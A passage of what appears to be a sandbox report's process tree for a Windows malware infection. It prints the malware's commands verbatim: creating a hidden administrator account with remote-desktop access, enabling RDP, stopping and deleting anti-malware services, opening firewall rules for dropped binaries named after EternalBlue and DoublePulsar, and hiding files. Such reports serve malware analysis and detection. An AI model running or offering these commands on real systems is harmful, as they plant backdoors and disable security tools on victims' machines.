      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
      4⤵
      PID:2776
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
        5⤵
        Modifies file permissions
        
        PID:732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
      4⤵
      PID:3092
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
        5⤵
        Modifies file permissions
        
        PID:1428
  - - C:\programdata\microsoft\intel\R8.exe
      C:\programdata\microsoft\intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:668
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:392
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:3156
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:216
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:1604
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:2080
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:4136
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:4176
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        
        PID:4240
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4272
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:5036
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:5068
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:4220
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:524
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:4268
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:4244
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:4304
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:4332
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:4300
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:4520
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:4488
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:4556
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:4668
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:4596
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:4768
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        
        PID:4680
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        
        PID:196
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:4404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4916
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        9⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        10⤵
        
        PID:4828
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:4840
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        9⤵
        Drops file in Program Files directory
        Views/modifies file attributes
        
        PID:2416
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        9⤵
        Views/modifies file attributes
        
        PID:5084
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:4864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appidsvc
      4⤵
      PID:2264
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appidsvc
        5⤵
        
        PID:1816
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc start appmgmt
      4⤵
      PID:4116
    - - C:\Windows\SysWOW64\sc.exe
        
        sc start appmgmt
        5⤵
        
        PID:4204
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
      4⤵
      PID:4284
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appidsvc start= auto
        5⤵
        
        PID:4336
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
      4⤵
      PID:4356
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config appmgmt start= auto
        5⤵
        
        PID:4400
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      4⤵
      PID:4420
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete swprv
        5⤵
        
        PID:4508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop mbamservice
      4⤵
      PID:4432
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop mbamservice
        5⤵
        
        PID:4528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
      4⤵
      PID:4592
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop bytefenceservice
        5⤵
        
        PID:4656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
      4⤵
      PID:4676
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete bytefenceservice
        5⤵
        
        PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete mbamservice
      4⤵
      PID:4904
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete mbamservice
        5⤵
        
        PID:4984
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete crmsvc
      4⤵
      PID:5116
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete crmsvc
        5⤵
        
        PID:2880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete "windows node"
      4⤵
      PID:4160
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete "windows node"
        5⤵
        
        PID:4236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
      4⤵
      PID:4328
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop Adobeflashplayer
        5⤵
        
        PID:4516
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
      4⤵
      PID:4792
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete AdobeFlashPlayer
        5⤵
        
        PID:5008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MoonTitle
      4⤵
      PID:2544
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MoonTitle
        5⤵
        
        PID:4920
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
      4⤵
      PID:5076
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MoonTitle"
        5⤵
        
        PID:1968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
      4⤵
      PID:3448
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop clr_optimization_v4.0.30318_64
        5⤵
        
        PID:4216
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
      4⤵
      PID:3648
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete clr_optimization_v4.0.30318_64"
        5⤵
        
        PID:4324
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
      4⤵
      PID:4348
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop MicrosoftMysql
        5⤵
        
        PID:4384
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
      4⤵
      PID:4396
    - - C:\Windows\SysWOW64\sc.exe
        
        sc delete MicrosoftMysql
        5⤵
        
        PID:4560
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      4⤵
      PID:4368
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall set allprofiles state on
        5⤵
        
        PID:4572
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      PID:4444
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        5⤵
        
        PID:4616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      PID:4692
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        5⤵
        
        PID:4992
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      PID:4856
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        5⤵
        
        PID:2208
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      PID:4932
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        5⤵
        
        PID:5104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:200
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:4260
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:4264
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:4428
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4472
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4576
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      PID:4980
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
        5⤵
        
        PID:4148
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      PID:2404
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        5⤵
        
        PID:708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      PID:4292
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        5⤵
        
        PID:4212
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      PID:1792
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
        5⤵
        
        PID:4172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      PID:4696
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
        5⤵
        
        PID:4988
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      PID:5048
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
        5⤵
        
        PID:4512
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      PID:5000
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
        5⤵
        
        PID:4628
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      PID:4580
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
        5⤵
        
        PID:2332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      PID:4104
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
        5⤵
        
        PID:5020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      PID:5016
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
        5⤵
        
        PID:3332
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      PID:3548
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
        5⤵
        
        PID:4252
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      PID:4832
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
        5⤵
        
        PID:4712
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      PID:5112
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
        5⤵
        
        PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:4464
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:4652
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
      4⤵
      PID:2624
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
        5⤵
        
        PID:4960
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4964
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:5092
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
      4⤵
      PID:4872
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
        5⤵
        
        PID:196
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4184
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:4156
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
      4⤵
      PID:4128
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.255
        5⤵
        
        PID:1896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:568
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:4112
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
      4⤵
      PID:4228
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.255
        5⤵
        
        PID:4416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
      4⤵
      PID:4716
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.255
        5⤵
        
        PID:4492
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
      4⤵
      PID:4636
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.248
        5⤵
        
        PID:4776
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:3944
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:5108
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
      4⤵
      PID:796
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.255
        5⤵
        
        PID:4544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:4084
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:4924
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
      4⤵
      PID:3644
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.255
        5⤵
        
        PID:4708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
      4⤵
      PID:4588
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.113
        5⤵
        
        PID:4500
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
      4⤵
      PID:4232
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.113
        5⤵
        
        PID:4344
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
      4⤵
      PID:4296
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.72
        5⤵
        
        PID:4188
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
      4⤵
      PID:2740
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.72
        5⤵
        
        PID:4948
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
      4⤵
      PID:4644
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.96
        5⤵
        
        PID:4248
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
      4⤵
      PID:4608
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.96
        5⤵
        
        PID:4456
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
      4⤵
      PID:4912
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.81
        5⤵
        
        PID:4308
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
      4⤵
      PID:3892
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.81
        5⤵
        
        PID:4976
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.22
      4⤵
      PID:1536
